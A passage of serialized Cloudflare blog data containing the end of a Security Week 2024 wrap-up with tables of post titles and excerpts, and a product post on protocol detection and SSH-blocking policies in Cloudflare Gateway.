style=\"font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent\">Log Explorer: monitor security events without third-party storage</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">With the combined power of Security Analytics and Log Explorer, security teams can analyze, investigate, and monitor logs natively within Cloudflare, reducing time to resolution and overall cost of ownership by eliminating the need of third-party logging systems.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/deskope-program-and-asdp-for-descaler/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Simpler migration from Netskope and Zscaler to Cloudflare: introducing Deskope and a Descaler partner update</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Cloudflare expands the Descaler program to Authorized Service Delivery Partners (ASDPs). Cloudflare is also launching Deskope, a new set of tooling to help migrate existing Netskope customers to Cloudflare One.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/protecting-apis-with-jwt-validation/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Protecting APIs with JWT Validation</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Cloudflare customers can now protect their APIs from broken authentication attacks by validating incoming JSON Web Tokens with API Gateway.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/announcing-express-cni\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Simplifying how enterprises connect to Cloudflare with Express Cloudflare Network Interconnect</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Express Cloudflare Network Interconnect makes it fast and easy to connect your network to Cloudflare. Customers can now order Express CNIs directly from the Cloudflare dashboard.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/treating-sase-anxiety/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Cloudflare treats SASE anxiety for VeloCloud customers</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">The turbulence in the SASE market is driving many customers to seek help. We’re doing our part to help VeloCloud customers who are caught in the crosshairs of shifting strategies.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/free-network-monitoring-for-enterprise\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Free network flow monitoring for all enterprise customers</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Announcing a free version of Cloudflare’s network flow monitoring product, Magic Network Monitoring. Now available to all Enterprise customers.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/guide-to-cloudflare-pages-and-turnstile-plugin/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Building secure websites: a guide to Cloudflare Pages and Turnstile Plugin</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Learn how to use Cloudflare Pages and Turnstile to deploy your website quickly and easily while protecting it from bots, without compromising user experience. </span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/waf-content-scanning-for-malware-detection/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">General availability for WAF Content Scanning for file malware protection</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Announcing the General Availability of WAF Content Scanning, protecting your web applications and APIs from malware by scanning files in-transit.</span></td>\n </tr>\n</tbody>\n</table><!--kg-card-end: html-->\n <div class=\"flex anchor relative\">\n <h3 id=\"how-can-we-help-make-the-internet-better\">How can we help make the Internet better?</h3>\n <a href=\"#how-can-we-help-make-the-internet-better\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <!--kg-card-begin: html--><style type=\"text/css\">\n.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;}\n.tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333;\n font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;}\n.tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333;\n font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;}\n.tg .tg-f50w{background-color:#F90;font-weight:bold;text-align:left;vertical-align:top}\n.tg .tg-zb5k{color:#15C;text-align:left;text-decoration:underline;vertical-align:top}\n.tg .tg-zb5k a{border-bottom: 0}\n.tg .tg-0lax{text-align:left;vertical-align:top}\n</style>\n<table class=\"tg\" width=\"100%\">\n<thead>\n <tr>\n <th class=\"tg-f50w\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Title</span></th>\n <th class=\"tg-f50w\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Excerpt</span></th>\n </tr>\n</thead>\n<tbody>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/protecting-global-democracy-against-threats-from-emerging-technology\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Cloudflare protects global democracy against threats from emerging technology during the 2024 voting season</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">At Cloudflare, we’re actively supporting a range of players in the election space by providing security, performance, and reliability tools to help facilitate the democratic process.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/navigating-the-maze-of-magecart/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Navigating the maze of Magecart: a cautionary tale of a Magecart impacted website</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Learn how a sophisticated Magecart attack was behind a campaign against e-commerce websites. This incident underscores the critical need for a strong client side security posture.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/building-urlscanner/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Cloudflare’s URL Scanner, new features, and the story of how we built it</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Discover the enhanced URL Scanner API, now integrated with the Security Center Investigate Portal. Enjoy unlisted scans, multi-device screenshots, and seamless integration with the Cloudflare ecosystem. </span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/secure-by-design-principles/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Changing the industry with CISA’s Secure by Design principles</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Security considerations should be an integral part of software’s design, not an afterthought. Explore how Cloudflare adheres to Cybersecurity &amp; Infrastructure Security Agency’s Secure by Design principles to shift the industry.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/pq-2024/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">The state of the post-quantum Internet</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Nearly two percent of all TLS 1.3 connections established with Cloudflare are secured with post-quantum cryptography. In this blog post we discuss where we are now in early 2024, what to expect for the coming years, and what you can do today.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/advanced-dns-protection/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Advanced DNS Protection: mitigating sophisticated DNS DDoS attacks</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Introducing the Advanced DNS Protection system, a robust defense mechanism designed to protect against the most sophisticated DNS-based DDoS attacks.</span></td>\n </tr>\n</tbody>\n</table><!--kg-card-end: html-->\n <div class=\"flex anchor relative\">\n <h3 id=\"sharing-the-cloudflare-way\">Sharing the Cloudflare way</h3>\n <a href=\"#sharing-the-cloudflare-way\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <!--kg-card-begin: html--><style type=\"text/css\">\n.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;}\n.tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333;\n font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;}\n.tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333;\n font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;}\n.tg .tg-f50w{background-color:#F90;font-weight:bold;text-align:left;vertical-align:top}\n.tg .tg-zb5k{color:#15C;text-align:left;text-decoration:underline;vertical-align:top}\n.tg .tg-zb5k a{border-bottom: 0}\n.tg .tg-0lax{text-align:left;vertical-align:top}\n</style>\n<table class=\"tg\" width=\"100%\">\n<thead>\n <tr>\n <th class=\"tg-f50w\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Title</span></th>\n <th class=\"tg-f50w\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Excerpt</span></th>\n </tr>\n</thead>\n<tbody>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/linux-kernel-hardening/\"><span style=\"font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent\">Linux kernel security tunables everyone should consider adopting</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">This post illustrates some of the Linux kernel features that are helping Cloudflare keep its production systems more secure. We do a deep dive into how they work and why you should consider enabling them.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/securing-cloudflare-with-cloudflare-zero-trust\"><span style=\"font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent\">Securing Cloudflare with Cloudflare: a Zero Trust journey</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">A deep dive into how we have deployed Zero Trust at Cloudflare while maintaining user privacy.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/network-performance-update-security-week-2024\"><span style=\"font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent\">Network performance update: Security Week 2024</span></a><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\"> </span></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Cloudflare is the fastest provider for 95th percentile connection time in 44% of networks around the world. We dig into the data and talk about how we do it.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/harnessing-office-chaos\"><span style=\"font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent\">Harnessing chaos in Cloudflare offices</span></a><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\"> </span></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">This blog discusses the new sources of “chaos” that have been added to LavaRand and how you can make use of that harnessed chaos in your next application.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/email-security-insights-on-cloudflare-radar\"><span style=\"font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent\">Launching email security insights on Cloudflare Radar</span></a><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\"> </span></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">The new Email Security section on Cloudflare Radar provides insights into the latest trends around threats found in malicious email, sources of spam and malicious email, and the adoption of technologies designed to prevent abuse of email.</span></td>\n </tr>\n</tbody>\n</table><!--kg-card-end: html-->\n <div class=\"flex anchor relative\">\n <h3 id=\"a-final-word\">A final word</h3>\n <a href=\"#a-final-word\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Thanks for joining us this week, and stay tuned for our next Innovation Week in early April, focused on the developer community.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"watch-on-cloudflare-tv\">Watch on Cloudflare TV</h3>\n <a href=\"#watch-on-cloudflare-tv\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <!--kg-card-begin: html--><div style=\"position: relative; padding-top: 56.25%;\">\n <iframe\n src=\"https://customer-rhnwzxvb3mg4wz3v.cloudflarestream.com/5ee89adf0512ef3570e7b1ecaa590329/iframe?preload=true&poster=https%3A%2F%2Fcustomer-rhnwzxvb3mg4wz3v.cloudflarestream.com%2F5ee89adf0512ef3570e7b1ecaa590329%2Fthumbnails%2Fthumbnail.jpg%3Ftime%3D%26height%3D600&startTime=11s\"\n loading=\"lazy\"\n style=\"border: none; position: absolute; top: 0; left: 0; height: 100%; width: 100%;\"\n allow=\"accelerometer; gyroscope; autoplay; encrypted-media; picture-in-picture;\"\n allowfullscreen=\"true\"\n ></iframe>\n</div><!--kg-card-end: html-->\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3S3nnZ6qfB6QnJAe9OwthD/05721dea96b2b756c5ab1989660293e3/image1-31.png\" alt=\"\" class=\"kg-image\" width=\"1802\" height=\"495\" loading=\"lazy\"/>\n \n </figure><p></p>"],"published_at":[0,"2024-03-11T14:00:05.000+00:00"],"updated_at":[0,"2024-10-09T23:27:39.457Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5cNsHrD4wMAjHP3MVL7EXZ/f6e6468cc7f6f12f6f39b200115fa78b/security-week-2024-wrap-up.png"],"tags":[1,[[0,{"id":[0,"3DmitkNK6euuD5BlhuvOLW"],"name":[0,"Security Week"],"slug":[0,"security-week"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"urEf9QllkDeGxTu3ysdlo"],"name":[0,"Application Security"],"slug":[0,"application-security"]}],[0,{"id":[0,"2Kxh34kIQRA3gyymmhJpsR"],"name":[0,"Email Security"],"slug":[0,"email-security"]}],[0,{"id":[0,"6Foe3R8of95cWVnQwe5Toi"],"name":[0,"AI"],"slug":[0,"ai"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Daniele Molteni"],"slug":[0,"daniele"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3Zh7G3qA4Y20jQXIMgwzOq/1b466a0034dff783ebc2c99595e2e1b6/daniele.jpg"],"location":[0,"London, UK"],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}],[0,{"name":[0,"Ankur Aggarwal"],"slug":[0,"ankur"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5jlZmfW8yTju4mM7ILqZTR/3adcdef58140a276c6586f81e4fdbecc/ankur.jpeg"],"location":[0,null],"website":[0,null],"twitter":[0,"@Encore_Encore"],"facebook":[0,null]}]]],"meta_description":[0,"In this blog post we review the blogs released during Security Week 2024."],"primary_author":[0,{}],"localeList":[0,{"name":[0,"Security Week 2024 wrap up Config"],"enUS":[0,"English for Locale"],"zhCN":[0,"Translated for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"Translated for Locale"],"frFR":[0,"Translated for Locale"],"deDE":[0,"Translated for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"Translated for Locale"],"koKR":[0,"Translated for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"Translated for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/security-week-2024-wrap-up"],"metadata":[0,{"title":[0,"Security Week 2024 wrap up"],"description":[0,"In this blog post we review the blogs released during Security Week 2024."],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4AsLQ9uAmPpoC0ztjZULkC/a8b7609c93ffa91939ea4e647e787ff6/security-week-2024-wrap-up-HzvSuy.png"]}]}],[0,{"id":[0,"6YAn1AAnAdlIRoE6jdYru4"],"title":[0,"Protocol detection with Cloudflare Gateway"],"slug":[0,"gatway-protocol-detection"],"excerpt":[0,"Cloudflare Gateway, our secure web gateway (SWG), now supports the detection, logging, and filtering of network protocols using packet payloads without the need for inspection"],"featured":[0,false],"html":[0,"\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/55wa5i6QrEIUbPOPVGFSaA/c84972174ed2baa556c2dc9053377639/image3-26.png\" alt=\"Protocol detection with Cloudflare Gateway\" class=\"kg-image\" width=\"1999\" height=\"1125\" loading=\"lazy\"/>\n \n </figure><p><a href=\"https://www.cloudflare.com/zero-trust/products/gateway/\">Cloudflare Gateway</a>, our <a href=\"https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/\">secure web gateway</a> (SWG), now supports the detection, logging, and filtering of network protocols regardless of their source or destination port. <a href=\"https://developers.cloudflare.com/cloudflare-one/policies/gateway/network-policies/protocol-detection/\">Protocol detection</a> makes it easier to set precise policies without having to rely on the well known port and without the risk of over/under-filtering activity that could disrupt your users’ work. For example, you can filter all SSH traffic on your network by simply choosing the protocol.</p><p>Today, protocol detection is available to any Enterprise user of Gateway and supports a growing list of protocols including HTTP, HTTPS, SSH, TLS, DCE/RPC, MQTT, and TPKT.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"why-is-this-needed\">Why is this needed?</h3>\n <a href=\"#why-is-this-needed\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>As many configuration planes move to using RESTful APIs, and now even GraphQL, there is still a need to manage devices via protocols like SSH. Whether it is the only management protocol available on a new third party device, or one of the first ways we learned to connect to and manage a server, SSH is still extensively used.</p><p>With other legacy SWG and firewall tools, the process of blocking traffic by specifying only the well known port number (for example, port 22 for SSH) can be both insecure and inconvenient. For example, if you used SSH over any other port it would not be filtered properly, or if you tried using another protocol over a well known port, such as port 22, it would be blocked. An argument could also be made to lock down the destinations to only allow incoming connections over certain ports, but companies don’t often control their destination devices.</p><p>With so many steps, there are risks of over-blocking legitimate traffic, which potentially prevents users from reaching the resources they need to stay productive and leads to a large volume of support tickets for your administrators. Alternatively, you could underblock and miss out on filtering your intended traffic, creating security risks for your organization.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"how-we-built-it\">How we built it</h3>\n <a href=\"#how-we-built-it\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>To build a performant protocol detection and filtering capability we had to make sure it could be applied in the same place Gateway policies are being applied. To meet this requirement we added a new TCP socket pre-read hook to <a href=\"/introducing-oxy\">OXY</a>, our Rust-based policy framework, to buffer the first few bytes of the data stream. This buffer, then, allows Gateway to compare the bytes to our protocol signature database and apply the correct next step. And since this is all built into OXY, if the policy is set to Block, the connection will be closed; if it’s set to Allow, the connection will be proxied or progressed to establish the TLS session.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"how-to-set-up-gateway-protocol-filtering\">How to set up Gateway protocol filtering</h3>\n <a href=\"#how-to-set-up-gateway-protocol-filtering\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Cloudflare Gateway’s protocol detection simplifies this process by allowing you to specify the protocol within a Gateway Network policy. To get started navigate to the Settings section on the Zero Trust dashboard and then select the Network tile. Under the Firewall section you’ll see a toggle for protocol detection and once enabled you’ll be able to create network policies.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/538WCkzBOxvjqsxPUPK8BD/59656702104c937c38783b364d777f60/pasted-image-0-5.png\" alt=\"\" class=\"kg-image\" width=\"1087\" height=\"124\" loading=\"lazy\"/>\n \n </figure><p>Next, go to the Firewall Policies section of your Zero Trust Gateway dashboard and then click ‘+ Add a policy’. There you can create a policy such as the one below to block SSH for all users within the Sales department.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7LZ9YqjrkB8RFalnn0XU1t/1debd4a0cefdb993a1c0d4b2161312b8/pasted-image-0--1--2.png\" alt=\"\" class=\"kg-image\" width=\"1432\" height=\"868\" loading=\"lazy\"/>\n \n </figure><p>This will prevent members of the sales team from initiating an outgoing or incoming SSH session.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"get-started\">Get started</h3>\n <a href=\"#get-started\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Customers with a Cloudflare One Enterprise account will find this functionality in their Gateway dashboard today. We plan to make it available to Pay-as-you-go and Free customer accounts soon, as well as expanding the list of protocols.</p><p>If you’re interested in using protocol detection or ready to explore more broadly how Cloudflare can help you modernize your security, <a href=\"https://www.cloudflare.com/products/zero-trust/plans/enterprise\">request a workshop</a> or contact your account manager.</p>"],"published_at":[0,"2024-03-08T14:00:58.000+00:00"],"updated_at":[0,"2024-10-09T23:27:36.225Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/ocpGsKY95Qk7xu9istbzL/587996f8bafa33a0d0a8b74f3268451a/gatway-protocol-detection.png"],"tags":[1,[[0,{"id":[0,"3DmitkNK6euuD5BlhuvOLW"],"name":[0,"Security Week"],"slug":[0,"security-week"]}],[0,{"id":[0,"15qx2Nvwrm4X8zknw3vXgC"],"name":[0,"Cloudflare 